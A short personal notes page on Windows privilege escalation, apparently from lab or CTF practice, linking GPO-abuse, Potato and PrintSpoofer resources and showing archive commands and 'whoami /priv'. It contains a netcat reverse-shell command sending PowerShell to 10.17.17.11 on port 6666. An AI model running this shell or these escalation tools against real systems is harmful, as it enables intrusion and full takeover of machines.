<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>privileges</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>privileges</h1>

      <div class="ck-content">
        <p><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#abuse-gpo-with-sharpgpoabuse">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#abuse-gpo-with-sharpgpoabuse</a>

        </p>
        <p><code>Start-Process -FilePath "C:\enterprise-share\nc64.exe" -ArgumentList "-nv 10.17.17.11 6666 -e powershell.exe"</code>

        </p>
        <p>for compressing files or folders from windows terminal</p><pre><code class="language-text-plain">Compress-Archive -Path C:\Users\winbu\Music\Benny Goodman Swings Again\*.mp3 -DestinationPath C:\Users\winbu\Music\favorite music.zip</code></pre><pre><code class="language-text-plain">Expand-Archive -LiteralPath sharp.zip -DestinationPath gposharp</code></pre>

        <p><code>whoami /priv</code>

        </p>
        <p><a href="https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html">https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html</a> </p>
        <p>For SeImPersonate: </p>
        <p><a href="https://github.com/itm4n/PrintSpoofer/releases">https://github.com/itm4n/PrintSpoofer/releases</a>  binaries</p>
        <figure
        class="image image_resized" style="width:49.59%">
          <img src="privileges/printspoofer.png" />
          </figure>
      </div>
    </div>
  </body>

</html>